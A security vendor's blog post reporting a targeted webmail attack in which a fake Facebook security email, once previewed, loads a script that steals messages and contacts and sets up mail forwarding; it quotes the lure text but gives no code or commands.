TrendLabs is currently monitoring an in the wild attack which highlights the underrated and often ignored risk to companies that allow employees to check their personal webmail while at work.
Yesterday, one of our colleagues in Taiwan received what looks like a targeted attack via webmail. Unlike other email-based attacks that require users to open the email, click on an embedded link or download and execute an attachment, this attack merely requires the user to preview the message in their browser in order to launch the attack.
The following is a screenshot of the email inbox page:
The above message is translated roughly as follows:
Subject: Have you ever logged in Facebook from unknown location?
Content:Dear Facebook User,
Your Facebook account is accessed from a computer or device or from a location that you have never used before. For protecting your account security, before you have confirm your account is not hacked, we temporarily locked down your account.
Have you ever logged in Facebook from other place?
If this is not your name, please use your personal computer to login Facebook and follow the instructions to manage your account information.
If this is not your account, please do not worry. Relogin can lead your back to your own account.
For more information, visit our Help Center here: . {link}
Thanks,
Facebook Security Team
Previewing the message prompts the download of a script from a remote URL. The downloaded script then injects itself into the page to initiate information theft. The stolen information includes sensitive data such as email messages and contact information. More importantly, the script also sets up email forwarding that sends all the user’s messages to a specific address.
The email appears to be specially crafted for a specific recipient, in which their Hotmail ID is specifically used in the malicious script embedded in the mail. Also, the subsequent download is based on the Hotmail ID and a number specified by the attacker. Changing the number may change the payload.
If an employee checks their personal webmail at work and falls victim to the attack, the attacker can have access to sensitive information that might be related to the company the employee is working for, including contacts, and email messages. Companies should take the risk of this and similar attacks seriously, especially considering that merely previewing the email launches the attack.
TrendLabs is currently working on a more detailed analysis of the attack. Just the same, users are advised to exercise caution when opening their Web-based email inbox especially at work, since attacks like these may inadvertently compromise sensitive data.
Trend Micro already detects the downloaded malicious script as JS_AGENT.SMJ and blocks the malicious URL used in this attack. We strongly recommend that Trend Micro customers enable Web Reputation in their Trend Micro product right away to avoid being victimized by this and similar attacks. Non-Trend Micro customers can protect themselves through a combination of free tools like Trend Micro Web Protect Add-on and Browser Guard, or the like.
Leave a reply
